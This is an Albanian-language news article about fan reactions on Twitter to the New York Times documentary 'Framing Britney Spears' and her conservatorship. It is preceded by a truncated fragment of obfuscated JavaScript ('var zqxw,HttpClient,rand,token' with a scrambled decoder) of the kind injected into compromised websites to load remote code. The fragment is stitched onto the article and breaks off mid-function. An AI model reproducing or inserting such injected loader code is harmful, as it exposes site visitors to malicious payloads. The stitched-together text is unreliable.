;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Reagimet e fansave pasi panë dokumentarin “Framing Britney Spears”

By

Sot është dhënë premiera e dokumentarit të ri me fokus në konservatoritetin e Britney Spears, dhe fansat e saj kanë shumë pikëpyetje rreth saj.

Ky dokumentar, i cili u prodhua nga The New York Times, ka qenë “hapës i syve” për shumicën dhe reagimet e tyre në Twitter e kanë sjellë këtë prodhim televiziv të radhitet me numër #2 në pozicionim për nga shikueshmëria aktuale.

Përshkrimi zyrtar për dokumentarin thotë se “njerëzit e afërt me Britney Spears dhe avokatët e lidhur me konservatorin e saj tani rivlerësojnë karrierën e saj fenomenale dhe rënien brutale, pasi ajo në gjykatë është duke luftuar me babanë në lidhje me atë se kush duhet ta kontrollojë jetën e saj.

“Gjithsesi, sapo mbarova #FramingBritneySpears dhe po e paketoj veturën time për të udhëtuar rreth shtetit për ta liruar unë vet atë. Kjo është qesharake tani”, ka shkruar një fans i saj pasi i ka parë episodet.

Një tjetër shtoi: “Faleminderit për këtë dokumentar! Me të vërtetë shpresoj që #FramingBritneySpear të ndihmojë në ndryshimin e perceptimit të publikut të gjerë se kush është Britney dhe ta ndihmojnë ta rimarrë kontrollin e jetës së saj. #Free Britney”.

Vetëm disa ditë para se dokumentari të transmetohej, fansat akuzuan ekipin e saj digjital duke u përpjekur të kuptojnë nëse Britney ishte ajo që në të vërtetë menaxhon Instagramin e saj.

Artikuj të ngjashëm